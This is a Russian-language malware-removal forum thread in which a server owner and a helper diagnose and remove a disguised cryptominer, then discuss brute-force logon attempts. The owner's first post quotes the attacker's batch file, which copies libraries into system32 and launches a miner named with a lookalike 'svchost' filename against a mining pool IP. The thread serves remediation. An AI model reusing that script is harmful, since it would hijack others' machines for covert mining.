TR/BitCoinMiner.Gen

**cas1k** · 11.11.2017, 10:23

Добрый день. На сервере с ОС Windows Server 2008 R2 наблюдается загрузка ЦП до 75% процессом svchost.exe. Удалось выяснить, что запуск процесса происходит автоматически при помощи планировщика заданий. Запускается файл tmpDEAD.bat следующего содержания.

chcp 1251
IF NOT EXIST c:\windows\system32\libcurl.dll (copy c:\windows\temp\libcurl.dll c:\windows\system32\libcurl.dll)
IF NOT EXIST c:\windows\system32\libeay32.dll (copy c:\windows\temp\libeay32.dll c:\windows\system32\libeay32.dll)
IF NOT EXIST c:\windows\system32\libgcc_s_seh-1.dll (copy c:\windows\temp\libgcc_s_seh-1.dll c:\windows\system32\libgcc_s_seh-1.dll)
IF NOT EXIST c:\windows\system32\libstdc++-6.dll (copy c:\windows\temp\libstdc++-6.dll c:\windows\system32\libstdc++-6.dll)
IF NOT EXIST c:\windows\system32\libwinpthread-1.dll (copy c:\windows\temp\libwinpthread-1.dll c:\windows\system32\libwinpthread-1.dll)
IF NOT EXIST c:\windows\system32\ssleay32.dll (copy c:\windows\temp\ssleay32.dll c:\windows\system32\ssleay32.dll)
IF NOT EXIST c:\windows\system32\zlib1.dll (copy c:\windows\temp\zlib1.dll c:\windows\system32\zlib1.dll)
IF NOT EXIST c:\windows\system32\svchоst.exe (copy c:\windows\temp\svchоst.exe c:\windows\system32\svchоst.exe)
c:\windows\system32\svchоst.exe -u %1 -t %2 -a cryptonight -o stratum+tcp://185.86.150.41:8080

После отключения задания в планировщике и удаления файлов через некоторое время ситуация повторяется. Также было замечено, что появилась новая учетная запись с правами администратора "Gama". Логи были сняты после завершения процесса svchost и удаления файлов. На сервере стоит NOD32, который на угрозу никак не реагирует. На другом компьютере Avira определила файл svchost.exe как троян TR/BitCoinMiner.Gen. Прошу вашей помощи.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 11.11.2017, 10:25

Уважаемый(ая) cas1k, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Vvvyg** · 11.11.2017, 12:00

Устраняйте уязвимость, которую используют в т. ч. нашумевшие шифровальщики WannaCry и Petya:
http://www.catalog.update.microsoft....px?q=KB4012212
http://www.catalog.update.microsoft....px?q=KB4012598
срочно устанавливайте, причём на всех компьютерах в сети, иначе не избавитесь от заразы. А лучше установите все доступные обновления безопасности.

Если компьютеров под XP нет - отключите протокол SMB версии 1.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

**cas1k** · 12.11.2017, 20:16

Установил обновление системы безопасности для ОС Windows (KB4012212) пока что только на сервере. Отключил SMB при помощи добавления записи в реестр. Прикрепляю архив с отчетами Farbar Recovery Scan Tool.

**Vvvyg** · 13.11.2017, 07:09

Запустите FRST/FRST64. В окне программы нажмите комбинацию Ctrl+Y - откроется Блокнот. Скопируйте в него следующий код:

Код:

File: C:\Windows\system32\svchоst.exe
2017-11-10 20:59 - 2017-10-09 20:36 - 001447424 _____ (The OpenSSL Project, hxxp://www.openssl.org/) C:\Windows\system32\libeay32.dll
2017-11-10 20:59 - 2017-10-09 20:36 - 001185271 _____ C:\Windows\system32\svchоst.exe
2017-11-10 20:59 - 2017-10-09 20:36 - 000572416 _____ (The cURL library, hxxp://curl.haxx.se/) C:\Windows\system32\libcurl.dll
2017-11-10 20:59 - 2017-10-09 20:36 - 000314880 _____ (The OpenSSL Project, hxxp://www.openssl.org/) C:\Windows\system32\ssleay32.dll
2017-11-10 20:59 - 2017-10-09 20:36 - 000089600 _____ C:\Windows\system32\zlib1.dll
2017-11-10 20:59 - 2017-10-09 20:36 - 000079637 _____ (MingW-W64 Project. All rights reserved.) C:\Windows\system32\libwinpthread-1.dll
2017-11-10 20:59 - 2017-10-09 20:36 - 000075264 _____ C:\Windows\system32\libgcc_s_seh-1.dll
2017-10-26 15:25 - 2017-10-26 15:25 - 001016795 _____ C:\Users\Миша\Downloads\Не подтвержден 571670.crdownload
2017-11-08 17:32 - 2014-01-21 18:17 - 000157952 _____ () C:\Users\Администратор\AppData\Local\Temp\UninstallSer.exe
FirewallRules: [SCW-Allow-Inbound-Access-To-ScsHost-TCP-RPC] => (Allow) %systemroot%\system32\scshost.exe
FirewallRules: [SCW-Allow-Inbound-Access-To-ScsHost-TCP-RPC-EndPointMapper] => (Allow) %systemroot%\system32\scshost.exe

Сохраните (Ctrl+S) и закройте.
Отключите временно антивирус, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

**cas1k** · 13.11.2017, 07:28

Лог прикреплен к сообщению.

**Vvvyg** · 13.11.2017, 20:16

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

File: C:\Windows\system32\svchоst.exe
2017-11-10 20:59 - 2017-10-09 20:36 - 001185271 _____ C:\Windows\system32\svchоst.exe
2017-11-08 17:32 - 2014-01-21 18:17 - 000157952 _____ () C:\Users\Администратор\AppData\Local\Temp\UninstallSer.exe

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!!
В FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

И следите, не появится ли майнер снова. У учётки Программист смените для профлактики пароль на сложный.

**cas1k** · 13.11.2017, 21:32

Лог прикреплен к сообщению. Майнер не появлялся, пока что все хорошо. Единственное, что насторожило, с 18 до 22 часов в журнале безопасности было зарегистрировано множество сообщений с кодом 4625. Предположительно брутфорс, причем имена учеток менялись с каждой попыткой (ИГОРЬ, ANDREI, HELEN и т.д.). Атака закончилась после перезагрузки сервера. Это последствия заражения или уже совсем другая песня?

Скрытый текст

Учетной записи не удалось выполнить вход в систему.

Субъект:
ИД безопасности: NULL SID
Имя учетной записи: -
Домен учетной записи: -
Код входа: 0x0

Тип входа: 3

Учетная запись, которой не удалось выполнить вход:
ИД безопасности: NULL SID
Имя учетной записи: ИГОРЬ
Домен учетной записи:

Сведения об ошибке:
Причина ошибки: Неизвестное имя пользователя или неверный пароль.
Состояние: 0xc000006d
Подсостояние: 0xc0000064

Сведения о процессе:
Идентификатор процесса вызывающей стороны: 0x0
Имя процесса вызывающей стороны: -

Сведения о сети:
Имя рабочей станции:
Сетевой адрес источника: -
Порт источника: -

Сведения о проверке подлинности:
Процесс входа: NtLmSsp
Пакет проверки подлинности: NTLM
Промежуточные службы: -
Имя пакета (только NTLM): -
Длина ключа: 0

Данное событие возникает при неудачной попытке входа. Оно регистрируется на компьютере, попытка доступа к которому была выполнена.

Поля "Субъект" указывают на учетную запись локальной системы, запросившую вход. Обычно это служба, например, служба "Сервер", или локальный процесс, такой как Winlogon.exe или Services.exe.

В поле "Тип входа" указан тип выполненного входа. Наиболее распространенными являются типы 2 (интерактивный) и 3 (сетевой).

В полях "Сведения о процессе" указано, какая учетная запись и процесс в системе выполнили запрос на вход.

Поля "Сведения о сети" указывают на источник запроса на удаленный вход. Имя рабочей станции доступно не всегда, и в некоторых случаях это поле может оставаться незаполненным.

Поля сведений о проверке подлинности содержат подробные данные о конкретном запросе на вход.
- В поле "Промежуточные службы" указано, какие промежуточные службы участвовали в данном запросе на вход.
- Поле "Имя пакета" указывает на подпротокол, использованный с протоколами NTLM.
- Поле "Длина ключа" содержит длину созданного ключа сеанса. Это поле может иметь значение "0", если ключ сеанса не запрашивался.

Скрыть

**Vvvyg** · 14.11.2017, 07:09

Систему не заражают, а взламывают.
Делайте уже свою админскую работу. Почитайте, как настроить файрволл, защититься от брутфорса. Здесь не курсы молодого сисадмина.

**cas1k** · 14.11.2017, 07:28

Вадим, спасибо большое за помощь! Загвоздка в том, что я программист, а не сисадмин. Что ж, будем повышать компетенцию.

**Vvvyg** · 14.11.2017, 19:40

Удалите папку C:\FRST со всем содержимым.

Выполните рекомендации после лечения.

TR/BitCoinMiner.Gen (заявка № 216231)

Опции темы